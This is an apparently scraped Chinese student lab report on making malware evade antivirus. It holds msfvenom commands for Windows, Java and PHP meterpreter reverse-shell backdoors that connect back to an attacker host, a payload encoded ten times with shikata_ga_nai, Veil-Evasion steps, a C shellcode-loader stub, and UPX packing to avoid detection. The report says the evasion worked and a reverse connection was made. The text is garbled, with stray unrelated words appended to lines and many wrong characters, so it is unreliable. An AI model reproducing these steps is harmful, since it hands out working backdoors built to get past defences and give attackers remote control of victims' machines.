1.1 正确使用msf编码器,msfvenom生成如jar之类的其余文件,veil-evasion,加壳工具,使用shellcode编程php
1.2 经过组合应用各类技术实现恶意代码免杀java
1.3 用另外一电脑实测,在杀软开启的状况下,可运行并回连成功,注明电脑的杀软名称与版本(由于Win10的自带实时监控杀毒墙,一运行文件就自动删除,因此没有作这个加分项)linux
通常是对恶意软件作处理,让它不被杀毒软件所检测。也是渗透测试中须要使用到的技术。
要作好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工做的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。shell
反过来也同样,了解了免杀的工具和技术,你也就具备了反制它的基础。编程
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikataga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.1 LPORT=5237 -f exe >fenix.exe
使用virscan进行扫描,结果以下所示:
windows
使用msf编码器对后门程序编码10次
安全
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.137.1 LPORT=5237 -f exe > met-encoded.exe
上传到virus total试试免杀操做是否有效
网络
使用Java后门程序生成命令tcp
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.137.1 lport=5237 x> 20165237_backdoor_java.jar
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.153.135 lport=443 x> 20165237_backdoor.php
use evasion use 7 set Lhost 192.168.153.135 set Lport 5237
而后再输入后门程序的文件名:payload5237
工具
用virscan看看查杀表现:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.135 LPORT=5237 -f c
unsigned char buf[] = 此处省略。 int main() { int (*func)() = (int(*)())buf; func(); }
i686-w64-mingw32-g++ 20165237.c -o 20165237.exe
编译这个.c文件为可执行文件;
检测结果:
upx 20165237.exe -o 20165237plus.exe
使用杀软扫描桌面文件,没有报警
运行后门程序,反弹链接成功
(因为Win10自带的windows defendedr有强制实时监测,因此当点开恶意程序时直接被删除,致使没法回连。。想加分都加不了)
一、杀软是如何检测出恶意代码的?
答:基于特征码:杀软会将恶意代码中有明显特征的一部分做为特征码,并创建起特征库,在检测时则比对特征码是否匹配。感想: 答:此次实验让我感觉到其实杀毒软件只能杀很常规的病毒或者恶意程序,虽然病毒库在持续更新,可是总会有未被查出的恶意软件或者恶意代码进入到本身的计算机,有一天破坏电脑数据。因此之后必定要注意安全上网,不要访问非法网站或者点开非法链接,说不定点开就会致使恶意软件的启动,从而被盗取计算机中的信息!